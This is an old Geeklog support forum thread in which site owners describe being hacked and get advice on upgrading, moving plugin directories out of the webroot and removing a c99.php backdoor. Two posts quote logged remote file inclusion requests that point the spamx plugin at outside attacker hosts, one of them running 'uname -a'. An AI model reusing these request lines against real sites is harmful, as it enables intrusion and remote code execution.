Posted on: 06/26/07 01:44am
By: JohnG7
HI All,
I don't suppose anyone knows of a way to tell if a geeklog install has been hacked?
Seems like someone keeps trying to hack through an IP from Mexico:
/geeklog/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://myfox.altervista.org/tool25.dat?&cmd=uname%20-a HTTP/1.1
Thanks in advance for any feedback.
Best,
john
Re: A way to tell if you've been hacked?
Posted on: 06/26/07 01:56am
By: jmucchiello
That's an old vulnerability. And a slim vulnerability at that. You had to run all of geeklog inside the webroot and had to have register_globals on. If you are using the latest GL, you are fine. Just block the IP if they are being annoying.
Re: A way to tell if you've been hacked?
Posted on: 06/26/07 01:54pm
By: Dirk
I'm actually seeing a lot of those on all my sites at the moment. If you don't have your plugin directory in the webroot, i.e. if you followed our installation instructions, you're save from those anyway.
If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.
bye, Dirk
Re: A way to tell if you've been hacked?
Posted on: 06/26/07 08:38pm
By: andyofne
Quote by: jmucchielloThat's an old vulnerability. And a slim vulnerability at that. You had to run all of geeklog inside the webroot and had to have register_globals on. If you are using the latest GL, you are fine. Just block the IP if they are being annoying.
And yet it actually worked on my site because I choose to be crafty with my installation method and I didn't follow the instructions very well.
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 12:22am
By: HerreVermeer
Quote by: DirkI'm actually seeing a lot of those on all my sites at the moment. If you don't have your plugin directory in the webroot, i.e. if you followed our installation instructions, you're save from those anyway.
If you do have the plugins directory in your webroot, e.g. because you used Fantastico to install Geeklog, make sure you're running on the latest version. You could also password-protect those directories to be sure.
I suppose by following the exact directions you mean:
Root
|-my website.host.com
| |-Admin
| | |-Plugins
| |
| |-Plugins
|
|-Geeklog
|-Plugins
I've been having problems too lately, my site was hacked (they replaced my index.php page which was now displaying a message by whoever hacked me) twice in the last three days, by two different hackers from as it seems totally different countries. I haven't changed the code since the latest version (1.4.0) of geeklog was released, and I haven't installed any new plugins too lately.
I was running an old versionn of media gallery however (1.4.7) but upgraded to 1.5.0 today. Other than that I was running two other old plugins: filemgmt and chatterblog, which I have now completely deleted and uninstalled.
Other than having my index.php page replaced I found a file called c99.php, on two different locations somewhere in my public html folder, and my bad_behavior log is also showing some of the logs that John is Talking about:
"Reason: User-Agent beginning with 'libwww-perl' prohibited
GET /links/index.php?category=Geeklog/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://kampsite.com/test4? HTTP/1.0" and much more of these
Is there any security leak that's been going on, or am I not protecting my files right (I have set it up as said in the geeklog installation, but not for any of the plugins)? Other than a little more than basic geeklog installations and handlings I'm also still nothing more than a newbee. Is there any way to better protect hackers from undermining my website's security (from potential hackers than like to destroy more than just my index page?)
Thanks a lot,
Herre
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 12:25am
By: HerreVermeer
Note that the last directory--plugins-- is actually under the geeklog directory. The spaces got deleted when I posted
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 02:55pm
By: jmucchiello
I found a file called c99.php
Delete it. It's a known backdoor. Google it and you will find just about every php project on the web has users asking what c99.php is.
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 03:01pm
By: Dirk
Quote by: HerreVermeer[I haven't changed the code since the latest version (1.4.0) of geeklog was released, and I haven't installed any new plugins too lately.[/p]
You should be running 1.4.0sr5-1, if you're still on a 1.4.0 version. In
1.4.0sr4[*1] , we had to remove the FCKeditor's file manager due to a security issue that let people upload files. Make sure you've really removed it.
Other than having my index.php page replaced I found a file called c99.php
That's probably a PHP shell they managed to upload.
As I already said above, the log entries are nothing to worry about
if you've secured your installation.
bye, Dirk
Re: A way to tell if you've been hacked?
Posted on: 06/27/07 03:57pm
By: HerreVermeer
My bad, I've been running geeklog version 1.4.1 for a while instead of 1.4.0 like I posted before.
About the c99.php file, I already got rid of them.
After the first time I got hacked I just found the first one. I didn't realize that there was a second one until I got hacked again, two days later.
I don't know for how long those files have been on my website, it might be that they have been there for a while. More important, this time I made sure that there are no more versions of the c99.php file present on my website. I haven't been hacked today... so my hopes are up.